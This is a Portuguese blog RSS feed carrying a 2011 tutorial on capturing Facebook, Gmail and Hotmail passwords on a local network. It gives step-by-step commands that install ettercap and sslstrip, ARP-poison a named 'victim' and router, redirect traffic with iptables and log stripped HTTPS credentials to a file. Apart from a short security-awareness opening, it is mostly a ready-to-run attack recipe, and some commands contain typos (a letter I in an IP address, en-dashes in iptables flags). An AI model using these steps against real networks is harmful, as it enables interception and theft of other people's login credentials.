<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ettercap Archives - Blog do Gesiel Bernardes</title>
	<atom:link href="https://gesielbernardes.eti.br/tag/ettercap/feed" rel="self" type="application/rss+xml" />
	<link>https://gesielbernardes.eti.br/tag/ettercap</link>
	<description>Blog sobre Tecnologia e Segurança da Informação</description>
	<lastBuildDate>Thu, 01 Sep 2016 17:24:13 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>
	<item>
		<title>Como capturar senhas do Facebook, Gmail, Twitter&#8230;</title>
		<link>https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Wed, 16 Nov 2011 13:29:27 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[senhas]]></category>
		<category><![CDATA[sslstrip]]></category>
		<guid isPermaLink="false">http://143.106.30.117/?p=11</guid>

					<description><![CDATA[<p>     Muitas vezes preocupamos muito com as invasões e ataques provenientes da Internet para nossa rede local. Porém as vezes o perigo pode estar mais próximo do que imaginamos. Cerca de 70% dos ataques são feitos a partir da rede interna. Por isso senhas absurdamente complexas aliada á algum outro meio de autenticação torna-se… <span class="read-more"><a href="https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html">Como capturar senhas do Facebook, Gmail, Twitter&#8230;</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div>
<p>     Muitas vezes preocupamos muito com as invasões e ataques provenientes da Internet para nossa rede local. Porém as vezes o perigo pode estar mais próximo do que imaginamos. Cerca de 70% dos ataques são feitos a partir da rede interna. Por isso senhas absurdamente complexas aliada á algum outro meio de autenticação torna-se quase que obrigatório para uma rede Wireless. Neste pequeno tutorial veremos como um invasor pode capturar informações até mesmo consideradas como seguras e criptografadas.</p>
</div>
<div>
<p>     Desde já aviso: Não é simples e requer um conhecimento razoável na área, mas creio que funcione seguindo como “receita de bolo”.</p>
</div>
<div>
<p> <b style="line-height: 1.5em;">Requisitos:</b></p>
</div>
<ul>
<li>
<div>
<p>Computador com sistema operacional Linux (neste caso usarei o Fedora 15) conectado na mesma rede da vítima.</p>
</div>
</li>
<li>
<div>
<p>Conexão com a Internet;</p>
</div>
</li>
<li>
<div>
<p>Conhecimento intermediário em Redes/Linux.</p>
</div>
</li>
</ul>
<div>
<p>     O ataque é baseado no envenenamento da tabela ARP da vítima. Com isso, todo tráfego que a vítima enviará ao roteador será interceptado. Vamos usar menos teoria e mais prática:</p>
</div>
<div>
<p>&nbsp;</p>
</div>
<div>
<p><b>Cenário:</b></p>
</div>
<ul>
<li>IP da vítima: 192.168.0.67</li>
<li>IP do roteador: 192.168.0.1</li>
</ul>
<p>&nbsp;</p>
<p style="display: inline !important;"><span style="text-decoration: underline;">     <b>Passo 1 – Baixar e Instalar pacotes</b></span></p>
<div>
<p> <span style="line-height: 1.5em;">Executar (sempre como root) os comandos abaixo:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># yum -y install ettercap python-twisted-web</i></p>
</div>
<div>
<p><i># wget <a href="http://www.thoughtcrime.org/sslstrip/sslstrip-0.9.tar.gz">http://www.thoughtcrime.org/sslstrip/sslstrip-0.9.tar.gz</a></i></p>
</div>
<div>
<p><i># tar xvfz sslstrip-0.9.tar.gz</i></p>
</div>
<div>
<p><i># cd sslstrip-0.9</i></p>
</div>
<div>
<p># python setup.py install &amp;&amp; ln -s /usr/local/bin/sslstrip /bin/sslstrip</p>
</div>
<div>
<p>&nbsp;</p>
</div>
<div>
<p><b><span style="text-decoration: underline;">     Passo 2 – Atacar a vítima</span></b></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     O primeiro passo é habilitar o encaminhamento de pacotes, utilizar o seguinte comando:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># echo 1 &gt; /proc/sys/net/ipv4/ip_forward</i></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     Para envenenar a tabela ARP da vítima, iremos utilizar o Ettercap. Executar o seguinte comando:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># ettercap -Tq -i eth0 -M arp:remote,oneway /IP-da-vitima/ /IP-do-roteador/</i></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     No meu caso, ficou dessa forma:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># ettercap -Tq -i eth0 -M arp:remote,oneway /192.168.0.67/ /I92.168.0.1/</i></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     Desta forma, todo o tráfico já é interceptado, e é possível capturar senhas não criptografadas com o Wireshark, por exemplo, como no print abaixo:</span></p>
</div>
<p><a href="http://1.bp.blogspot.com/-C6Pv4mgx3E4/TsQYn7T0aUI/AAAAAAAAABk/iFYmmvVHOwk/s1600/pass1.jpg"><img fetchpriority="high" decoding="async" alt="" src="https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F1.bp.blogspot.com%2F-C6Pv4mgx3E4%2FTsQYn7T0aUI%2FAAAAAAAAABk%2FiFYmmvVHOwk%2Fs640%2Fpass1.jpg&amp;container=blogger&amp;gadget=a&amp;rewriteMime=image%2F*" width="640" height="390" border="0" data-orig-src="http://1.bp.blogspot.com/-C6Pv4mgx3E4/TsQYn7T0aUI/AAAAAAAAABk/iFYmmvVHOwk/s640/pass1.jpg" /></a></p>
<div>
<p> <span style="line-height: 1.5em;"> </span><span style="line-height: 1.5em;">     Mas e as senhas criptografadas? Para elas vamos utilizar o Sslstrip, que faz uma espécie de “proxy”, fazendo a leitura das páginas https e convertendo-as para http. Para acioná-lo executar os passos abaixo:</span></p>
</div>
<div>
<p><i style="line-height: 1.5em;"># iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080</i></p>
</div>
<div>
<p><i style="line-height: 1.5em;"># sslstrip -l 8080 -w /root/log.txt</i></p>
</div>
<div>
<p><span style="line-height: 1.5em;">     Pronto! Todos as requisições https ficarão registradas em /root/log.txt. Com isso é possível capturar senhas do Hotmail, MSN, Gmail, Facebook, entre outras. (ver print abaixo).</span></p>
</div>
<p><a href="http://2.bp.blogspot.com/-6PntjY-7grU/TsQYvvufeYI/AAAAAAAAABs/PIb8EGX_wOw/s1600/pass2.jpg"><img decoding="async" alt="" src="https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F2.bp.blogspot.com%2F-6PntjY-7grU%2FTsQYvvufeYI%2FAAAAAAAAABs%2FPIb8EGX_wOw%2Fs640%2Fpass2.jpg&amp;container=blogger&amp;gadget=a&amp;rewriteMime=image%2F*" width="640" height="110" border="0" data-orig-src="http://2.bp.blogspot.com/-6PntjY-7grU/TsQYvvufeYI/AAAAAAAAABs/PIb8EGX_wOw/s640/pass2.jpg" /></a></p>
<div>
<p><span style="line-height: 1.5em;">     Caso queira mais informações, pode ver no artigo original, feito por Ygor Bittencourt, publicado na revista ADMIN, Redes &amp; Segurança, 3° edição. Até mais&#8230;&#8230;</span></p>
</div>
<div>
<p>&nbsp;</p>
</div>
<p>The post <a href="https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html">Como capturar senhas do Facebook, Gmail, Twitter&#8230;</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
